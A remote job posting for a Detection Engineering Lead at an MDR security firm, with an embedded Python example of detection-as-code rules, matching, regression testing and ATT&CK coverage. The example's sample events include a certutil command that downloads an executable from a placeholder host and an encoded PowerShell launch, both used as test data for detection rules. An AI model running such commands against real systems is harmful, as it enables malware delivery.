Binary Defense

Detection Engineering Lead - REMOTE

Binary Defense offers comprehensive cybersecurity solutions through Managed Detection and Response, helping organizations protect against critical cyber threats.

Employee count: 51-200

United States only

Description

Binary Defense is seeking a Detection Engineering Lead to serve as both a technical leader and hands-on contributor within our Detection Engineering function. This is a working manager position responsible for managing the day-to-day operations of the detection engineering team, while also actively participating in detection logic development, telemetry analysis, and strategy execution.

You’ll play a pivotal role in evolving and implementing a scalable detection GitOps process that aligns with business risk, quantifiable metrics, and coverage across the MITRE ATT&CK framework. This role requires deep technical expertise, strong cross-functional communication, and the ability to deliver high-impact security detections at scale.

Key Responsibilities:

  • Lead and mentor a team of Detection Engineers in designing, developing, and maintaining threat detection logic across SIEM, EDR, and cloud platforms.
  • Actively contribute to detection development efforts — including rule creation, tuning, threat modeling, and attack simulation — with an eye toward quality, performance, and detection efficacy.
  • Develop and maintain a structured detection-as-code lifecycle, from ideation to testing, deployment, tuning, and retirement, with appropriate documentation and traceability.
  • Establish detection coverage tracking and reporting metrics aligned to business-critical assets and MITRE ATT&CK, including quantifiable risk scoring tied to each detection.
  • Collaborate across teams (Threat Intel, Incident Response, Security Engineering, Cloud Engineering, etc.) to ensure detections are informed by real-world threats and deployed across the correct telemetry.
  • Analyze telemetry quality and advocate for improvements to logging pipelines, data normalization, and event enrichment based on detection requirements.
  • Stay current on emerging attacker TTPs, threat actors, and malware trends to ensure proactive detection coverage.
  • Support attack testing to validate detection logic and improve effectiveness.
  • Own onboarding and documentation of detection tooling, processes, and coverage across the organization.
  • Serve as the subject matter expert on telemetry sources and their detection use cases across endpoint, network, application, and cloud layers.
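The detection-as-code lifecycle and ATT&CK coverage tracking listed above can be shown end to end in a few dozen lines. The following is an added example written for this page, not Binary Defense's tooling: two hypothetical rules in a Sigma-like shape (rule IDs, the CcmExec.exe tuning exclusion and the Sysmon-style events are all constructed), a small matcher, a regression gate that must pass before a rule is deployed, and a coverage report built from the rules' ATT&CK tags.

```python
"""Detection-as-code in miniature: rules as data, a Sigma-style matcher,
a regression gate before deployment, and an ATT&CK coverage report.
Rule IDs, the filter_parent exclusion and all events are constructed."""
from collections import defaultdict

# Hypothetical rules. Field names follow Sysmon Event ID 1 (process creation);
# matching is case-insensitive, as in Sigma.
RULES = [
    {
        "id": "certutil-download",  # hypothetical rule identifier
        "title": "certutil used to fetch a remote file",
        "tags": ["attack.command_and_control", "attack.t1105"],
        "logsource": {"category": "process_creation"},
        "detection": {
            "selection": {
                "Image|endswith": "\\certutil.exe",
                "CommandLine|contains": ["-urlcache", "-verifyctl"],
            },
            "condition": "selection",
        },
    },
    {
        "id": "powershell-encoded-command",  # hypothetical rule identifier
        "title": "PowerShell launched with an encoded command",
        "tags": ["attack.execution", "attack.t1059.001",
                 "attack.defense_evasion", "attack.t1027"],
        "logsource": {"category": "process_creation"},
        "detection": {
            "selection": {
                "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                "CommandLine|contains": ["-enc ", "-encodedcommand", "-ec "],
            },
            # Hypothetical tuning exclusion, the kind added after triage of a noisy parent.
            "filter_parent": {"ParentImage|endswith": "\\ccmexec.exe"},
            "condition": "selection and not filter_parent",
        },
    },
]


def ev(image, cmdline, parent="C:\\Windows\\System32\\cmd.exe"):
    """Build a constructed Sysmon-style process-creation event."""
    return {"category": "process_creation", "Image": image,
            "CommandLine": cmdline, "ParentImage": parent}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CERTUTIL = "C:\\Windows\\System32\\certutil.exe"
EVENTS = [  # constructed sample telemetry, not real logs
    ev(CERTUTIL, "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe"),
    ev(CERTUTIL, "certutil -hashfile setup.msi SHA256"),
    ev(PS, "powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoACkA"),
    ev(PS, "powershell.exe -NoP -EncodedCommand SQBFAFgAIAAoACkA",
       parent="C:\\Windows\\CCM\\CcmExec.exe"),
    ev(PS, "powershell.exe -File C:\\scripts\\backup.ps1"),
]


def _group_matches(group, event):
    """True when every 'Field|modifier': pattern(s) entry in the group matches."""
    for spec, patterns in group.items():
        field, _, modifier = spec.partition("|")
        value = str(event.get(field, "")).lower()
        pats = [str(p).lower() for p in (patterns if isinstance(patterns, list) else [patterns])]
        if modifier == "":
            ok = value in pats
        elif modifier == "contains":
            ok = any(p in value for p in pats)
        elif modifier == "startswith":
            ok = any(value.startswith(p) for p in pats)
        elif modifier == "endswith":
            ok = any(value.endswith(p) for p in pats)
        else:
            raise ValueError(f"unsupported modifier: {modifier}")
        if not ok:
            return False
    return True


def _eval_condition(condition, groups):
    """Evaluate 'a and not b or c' (not > and > or) without eval()."""
    clauses, current = [], []
    for tok in condition.split():
        if tok == "or":
            clauses.append(current)
            current = []
        else:
            current.append(tok)
    clauses.append(current)

    def clause_true(toks):
        result, negate = True, False
        for tok in toks:
            if tok == "and":
                continue
            if tok == "not":
                negate = True
                continue
            val = groups[tok]  # KeyError on an undefined group means a broken rule
            result = result and (not val if negate else val)
            negate = False
        return result
    return any(clause_true(c) for c in clauses)


def rule_matches(rule, event):
    det = rule["detection"]
    if rule["logsource"].get("category") not in (None, event.get("category")):
        return False
    groups = {n: _group_matches(g, event) for n, g in det.items() if n != "condition"}
    return _eval_condition(det["condition"], groups)


def run_rules(rules, events):
    """Return (rule_id, event_index) pairs: the alerts the rule set would raise."""
    return [(r["id"], i) for i, e in enumerate(events) for r in rules if rule_matches(r, e)]


def regression_passes(rules, events, expected):
    """Deployment gate: the rule set must raise exactly the expected alerts."""
    return sorted(run_rules(rules, events)) == sorted(expected)


def attack_coverage(rules):
    """Map ATT&CK technique IDs (from 'attack.tNNNN' tags) to the rules covering them."""
    cov = defaultdict(list)
    for r in rules:
        for tag in r["tags"]:
            if tag.startswith("attack.t"):
                cov[tag.split(".", 1)[1].upper()].append(r["id"])
    return dict(cov)


EXPECTED_ALERTS = [("certutil-download", 0), ("powershell-encoded-command", 2)]

if __name__ == "__main__":
    print("alerts:", run_rules(RULES, EVENTS))
    print("gate passed:", regression_passes(RULES, EVENTS, EXPECTED_ALERTS))
    print("coverage:", attack_coverage(RULES))
```

In a real pipeline the rules and the expected-alert list live in version control next to the sample events, so a pull request that tunes a rule (here, the `filter_parent` exclusion silencing the CcmExec.exe-spawned event) has to keep the regression gate green, and the coverage map feeds the ATT&CK reporting rather than being maintained by hand.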

Requirements

  • 5+ years of experience in detection engineering, threat hunting, or security operations.
  • 2+ years in a leadership or mentoring role within a security engineering team.
  • Proven experience developing and tuning detection rules across SIEM platforms (e.g., Splunk, Sentinel, Chronicle), EDR solutions (e.g., CrowdStrike, SentinelOne), and cloud environments (e.g., AWS, GCP, Azure).
  • Deep understanding of telemetry sources such as Windows Event Logs, Sysmon, PowerShell logs, DNS, proxy/firewall, cloud audit logs, and their detection potential.
  • Familiarity with attack chains and adversary tradecraft including MITRE ATT&CK, LOLBAS, process injection, credential access, lateral movement, cloud control plane abuse, etc.
  • Strong understanding of security data modeling, detection-as-code practices, and the use of rule formats such as Sigma or YARA-L.
  • Experience with REST API interfaces and using automation to streamline detection development or testing.
  • Strong written and verbal communication skills with the ability to translate complex technical threats into understandable business risk.
  • Ability to balance project management responsibilities with individual technical contributions.

Preferred Qualifications

  • Experience implementing or contributing to a Detection Engineering framework or strategy (e.g., Palantir ADS, MITRE D3FEND, etc.)
  • Familiarity with risk scoring methodologies and mapping detections to risk reduction outcomes.
  • Experience working in a multi-tenant or MDR environment and building detections at scale.
  • Knowledge of data pipeline tools and log forwarding agents (e.g., Fluent Bit, Logstash, Elastic Agent, Sysmon XML config tuning).
  • Hands-on experience with attack simulation tools like Atomic Red Team, Caldera, or manual adversary emulation.

About Binary Defense

Binary Defense is a trusted leader in security operations, supporting companies of all sizes to proactively monitor, detect and respond to cyberattacks. The company offers a personalized Open XDR approach to Managed Detection and Response, advanced Threat Hunting, Digital Risk Protection, Phishing Response, and Incident Response services, helping customers mature their security program efficiently and effectively based on their unique risks and business needs.

With a world-class 24/7 SOC, deep domain expertise in cyber, and sophisticated technology, hundreds of companies across every industry have entrusted Binary Defense to protect their business. Binary Defense gives companies actionable insights within minutes, not hours, the confidence that their program is resilient to ever-changing threats, and the time back that matters most to their business.

Binary Defense is also the Trusted Cybersecurity Partner of the Cleveland Browns and partners with PGA TOUR players. For more information, visit our website, check out our blog, or follow us on LinkedIn.

Binary Defense offers competitive medical, dental and vision coverage for employees and dependents, a 401k match which vests every payroll, a flexible and remote friendly work environment, as well as training opportunities to expand your skill set (to name a few!). If you’re interested in joining a growing team with great perks, we encourage you to apply!

About the job

Job type: Full Time

Experience level: Senior, Manager

Hiring timezones: United States +/- 0 hours

About Binary Defense

Binary Defense is committed to protecting organizations against evolving cyber threats through its extensive Managed Detection and Response (MDR) services. Founded in 2014 by cybersecurity experts, our mission centers on providing personalized protection by combining elite technology and a dedicated team of professionals. We specialize in delivering human-driven, technology-assisted security solutions that empower businesses to defend their systems against sophisticated attacks.

We recognize that the landscape of cybersecurity is constantly changing, requiring a proactive approach in threat hunting, incident response, and digital risk protection. Our services are structured to provide a comprehensive security framework, leveraging threat intelligence and advanced detection capabilities. Our 24/7 Security Operations Center ensures constant monitoring and swift incident response, allowing our clients to concentrate on their core business operations while we take care of their cybersecurity needs. Trusted by businesses of all sizes, we understand the critical nature of cybersecurity and remain at the forefront of industry innovations to ensure our clients are well-protected against potential vulnerabilities.

Binary Defense hiring Detection Engineering Lead - REMOTE • Remote (Work from Home) | Himalayas